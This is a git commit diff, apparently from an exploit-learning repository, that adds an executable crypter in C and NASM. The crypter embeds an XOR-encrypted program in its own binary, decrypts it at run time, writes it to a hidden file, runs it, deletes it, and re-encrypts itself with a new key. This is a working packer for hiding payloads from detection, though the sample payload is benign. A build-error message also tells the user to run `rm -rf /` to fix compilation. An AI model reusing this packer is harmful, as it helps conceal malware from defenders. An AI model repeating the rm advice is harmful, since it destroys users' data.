very basic exec crypter/runner

Signed-off-by: Toni Uhlig <matzeton@googlemail.com>

6 files changed, 264 insertions, 1 deletions

diff --git a/.gitignore b/.gitignore
index 8f0077a..9a0e7b1 100644
--- a/.gitignore
+++ b/.gitignore
@@ -8,3 +8,7 @@ sc-test
 sc-test_x64
 funcjmp_simple_x86
 funcjmp_ext_x86
+exec_crypter
+exec_crypter_x64
+exec_payload
+exec_payload_x64
diff --git a/Makefile b/Makefile
index aff3b9e..8eb68e2 100644
--- a/Makefile
+++ b/Makefile
@@ -1,20 +1,46 @@
 CD := cd
 MAKE := make
 RM := rm
+AS := nasm
 CC := gcc
 STRIP := strip
 LBITS := $(shell getconf LONG_BIT)
 CFLAGS += -Wall -O0 -g
 OCFLAGS += -zexecstack -znorelro -fno-stack-protector -fno-pie -ggdb -static
+ECFLAGS += -Wall -O2 -ggdb
 X86_FLAGS = -m32 -mpreferred-stack-boundary=2
 X64_FLAGS = -m64 -mpreferred-stack-boundary=4
 SOURCES = $(wildcard *.c)
 TARGETS = $(patsubst %.c,%,$(SOURCES))
 
-all: $(TARGETS) overflow_x64 overflow_tcp_x64 sc-test_x64 shellcode crypter
+ifeq ($(LBITS),64)
+all: $(TARGETS) exec_payload_x64 exec_crypter_x64 overflow_x64 overflow_tcp_x64 sc-test_x64 shellcode crypter
+else
+all: $(TARGETS) shellcode crypter
+endif
 
 main: $(TARGETS)
 
+exec_payload: exec_payload.c
+	$(CC) $(ECFLAGS) -m32 -o $@ $<
+
+exec_payload_x64: exec_payload.c
+	$(CC) $(ECFLAGS) -m64 -o $@ $<
+
+exec_payload_bin.o: exec_payload
+	$(STRIP) -s $<
+	$(AS) -felf32 -o $@ exec_crypter.asm
+
+exec_crypter: exec_payload_bin.o
+	$(CC) $(ECFLAGS) -m32 -D_NOTASKID=1 -o $@ $< exec_crypter.c
+
+exec_payload_x64_bin.o: exec_payload_x64
+	$(STRIP) -s $<
+	$(AS) -felf64 -o $@ exec_crypter_x64.asm
+
+exec_crypter_x64: exec_payload_x64_bin.o
+	$(CC) $(ECFLAGS) -m64 -D_NOTASKID=1 -o $@ $< exec_crypter.c
+
 debug:
 	$(MAKE) -C . CFLAGS="-g"
 
@@ -34,6 +60,7 @@ rebuild: clean all
 clean:
 	$(RM) -f *.o
 	$(RM) -f $(TARGETS) $(patsubst %,%_x64,$(TARGETS))
+	$(RM) -f exec_payload_x64 exec_crypter_x64 overflow_x64 overflow_tcp_x64 sc-test_x64
 	$(MAKE) -C crypter clean
 	$(MAKE) -C shellcode clean
 
diff --git a/exec_crypter.asm b/exec_crypter.asm
new file mode 100644
index 0000000..717a6c7
--- /dev/null
+++ b/exec_crypter.asm
@@ -0,0 +1,12 @@
+bits 32
+section .rodata
+
+global _exec_payload_start
+global _exec_payload_end
+global _exec_payload_size
+
+db 0xde,0xad,0xc0,0xde ; marker
+dd 0x00000000,0x00000000,0x00000000,0x00000000 ; xor key
+_exec_payload_start: incbin "exec_payload"
+_exec_payload_end:
+_exec_payload_size:  dd $ - _exec_payload_start
diff --git a/exec_crypter.c b/exec_crypter.c
new file mode 100644
index 0000000..2ce4580
--- /dev/null
+++ b/exec_crypter.c
@@ -0,0 +1,202 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <errno.h>
+#include <unistd.h>         /* close() */
+#include <stdint.h>         /* uint* */
+#include <string.h>         /* mem*() */
+#include <fcntl.h>          /* open() */
+#include <sys/stat.h>       /* fstat(), struct stat */
+#include <sys/sendfile.h>   /* sendfile() */
+#include <sys/mman.h>       /* mmap(), munmap() */
+#include <sys/time.h>       /* gettimeofday() */
+#include <limits.h>         /* LONG_MAX */
+#include <libgen.h>         /* basename() */
+
+#define XOR_KEYLEN 4
+extern uint8_t _exec_payload_start[];
+extern uint8_t _exec_payload_end[];
+extern uint32_t _exec_payload_size;
+
+typedef struct MyExecHeader {
+    uint32_t marker;
+    uint32_t xorkey[XOR_KEYLEN];
+    uint8_t payload[0];
+} __attribute__((packed, gcc_struct)) MyExecHeader;
+
+static uint8_t *
+findMarker(uint8_t *buf, size_t siz) {
+    size_t i;
+
+    for (i = 3; i < siz; ++i) {
+        if (buf[i-3] == 0xde &&
+            buf[i-2] == 0xad &&
+            buf[i-1] == 0xc0 &&
+            buf[i+0] == 0xde)
+        {
+            return &buf[i-3];
+        }
+    }
+
+    return NULL;
+}
+
+static long int
+random_number(long int n)
+{
+    int seed;
+    struct timeval tm;
+
+    gettimeofday(&tm, NULL);
+    seed = tm.tv_sec + tm.tv_usec;
+    srandom(seed);
+    return (random() % n);
+}
+
+static void
+xor_genkey(MyExecHeader *my_ehdr)
+{
+    size_t i;
+    uint32_t rnd[XOR_KEYLEN];
+
+    for (i = 0; i < XOR_KEYLEN; ++i) {
+        rnd[i] = (uint32_t) random_number(LONG_MAX);
+    }
+    memcpy(my_ehdr->xorkey, rnd, sizeof my_ehdr->xorkey);
+}
+
+static void
+xor_crypt(MyExecHeader *my_ehdr)
+{
+    size_t i;
+    uint8_t xb;
+    uint8_t *key = (uint8_t *) &my_ehdr->xorkey[0];
+
+    for (i = 0; i < _exec_payload_size; i++) {
+        xb = key[i % sizeof my_ehdr->xorkey];
+        my_ehdr->payload[i] ^= xb;
+    }
+}
+
+static char *
+shexbuf(uint8_t *buf, size_t buflen, char *dest, size_t destlen)
+{
+    size_t i, j;
+    static const char hexal[] = "0123456789ABCDEF";
+    uint8_t halfByte;
+
+    for (i = 0, j = 0; i < buflen && j < destlen; ++i, j += 3) {
+        halfByte = buf[i] >> 4;
+        dest[j+0] = hexal[ halfByte % 16 ];
+        halfByte = buf[i] & 0x0F;
+        dest[j+1] = hexal[ halfByte % 16 ];
+        dest[j+2] = ' ';
+    }
+
+    dest[j+2] = 0;
+    return dest;
+}
+
+int main(int argc, char **argv) {
+    char new_path[BUFSIZ];
+    int arg0_fd, new_fd, exec_fd;
+    struct stat arg0_statbuf;
+    uint8_t *mmap_exec, *marker;
+    MyExecHeader *my_ehdr;
+    const uint8_t nullbuf[XOR_KEYLEN] = {0};
+    char temp[BUFSIZ] = {0};
+    char exec_path[BUFSIZ];
+    off_t exec_off;
+
+    if (argc < 1)
+        return 1;
+
+    printf("\n[example]\n"
+           "Start: %p\n"
+           "End..: %p\n"
+           "Size.: %u\n",
+           _exec_payload_start, _exec_payload_end,
+           _exec_payload_size);
+
+    snprintf(new_path, sizeof new_path, "./.%s", basename(argv[0]));
+    arg0_fd = open(argv[0], O_RDONLY, 0);
+    new_fd = open(new_path, O_RDWR | O_CREAT | O_EXCL,
+                  S_IRWXU | S_IRWXG | S_IRWXO);
+
+    printf("\n[fd]\n"
+           "arg0.: %d\n"
+           "new..: %d\n",
+           arg0_fd, new_fd);
+
+    if (arg0_fd < 0 || new_fd < 0)
+        return 1;
+    if (fstat(arg0_fd, &arg0_statbuf))
+        return 1;
+    if (sendfile(new_fd, arg0_fd, NULL,
+                 arg0_statbuf.st_size) != arg0_statbuf.st_size)
+        return 1;
+    close(arg0_fd);
+
+    mmap_exec = (uint8_t *) mmap(NULL, arg0_statbuf.st_size, PROT_READ | PROT_WRITE,
+                     MAP_SHARED, new_fd, 0);
+    if (!mmap_exec)
+        return 1;
+
+    printf("\n[exec]\n"
+           "mmap.: %p\n"
+           "size.: %lu\n",
+           mmap_exec, arg0_statbuf.st_size);
+
+    marker = findMarker(mmap_exec, arg0_statbuf.st_size);
+    if (!marker)
+        return 1;
+
+    printf("mark.: %p\n", marker);
+
+    my_ehdr = (MyExecHeader *) marker;
+    if (!memcmp(my_ehdr->xorkey, nullbuf, XOR_KEYLEN)) {
+        xor_genkey(my_ehdr);
+        printf("\nEmpty XOR Key .. Generated: %s\n",
+               shexbuf((uint8_t *) my_ehdr->xorkey,
+                       sizeof my_ehdr->xorkey,
+                       temp, sizeof temp));
+    } else {
+        printf("\nXOR Key: %s\nDecrypt payload ..\n",
+               shexbuf((uint8_t *) my_ehdr->xorkey,
+                       sizeof my_ehdr->xorkey,
+                       temp, sizeof temp));
+        xor_crypt(my_ehdr);
+        memset(my_ehdr->xorkey, 0, sizeof my_ehdr->xorkey);
+
+        printf("\nExtracting payload size %u\n",
+               _exec_payload_size);
+        snprintf(exec_path, sizeof exec_path, "%s_", new_path);
+
+        exec_fd = open(exec_path, O_RDWR | O_CREAT,
+                       S_IRWXU | S_IRWXG | S_IRWXO);
+        if (exec_fd < 0)
+            return 1;
+
+        exec_off = my_ehdr->payload - mmap_exec;
+        printf("Extracted %zd\n",
+               sendfile(exec_fd, new_fd, &exec_off, _exec_payload_size));
+
+        close(exec_fd);
+
+        printf("Exec and Remove %s\n", exec_path);
+        printf("Returned: 0x%X\n", system(exec_path));
+        unlink(exec_path);
+    }
+
+    xor_crypt(my_ehdr);
+
+    munmap(mmap_exec, arg0_statbuf.st_size);
+    close(new_fd);
+
+    rename(new_path, argv[0]);
+
+    return 0;
+}
+
+#ifndef _NOTASKID
+#error "Compiler error, type `rm -rf /` in your terminal to solve this issue."
+#endif
diff --git a/exec_crypter_x64.asm b/exec_crypter_x64.asm
new file mode 100644
index 0000000..ce1cd29
--- /dev/null
+++ b/exec_crypter_x64.asm
@@ -0,0 +1,12 @@
+bits 64
+section .rodata
+
+global _exec_payload_start
+global _exec_payload_end
+global _exec_payload_size
+
+db 0xde,0xad,0xc0,0xde ; marker
+dd 0x00000000,0x00000000,0x00000000,0x00000000 ; xor key
+_exec_payload_start: incbin "exec_payload_x64"
+_exec_payload_end:
+_exec_payload_size:  dd $ - _exec_payload_start
diff --git a/exec_payload.c b/exec_payload.c
new file mode 100644
index 0000000..3d57df1
--- /dev/null
+++ b/exec_payload.c
@@ -0,0 +1,6 @@
+#include <stdio.h>
+
+int main(void) {
+    printf("I could be a dangerous payload ..\n");
+    return 0x66;
+}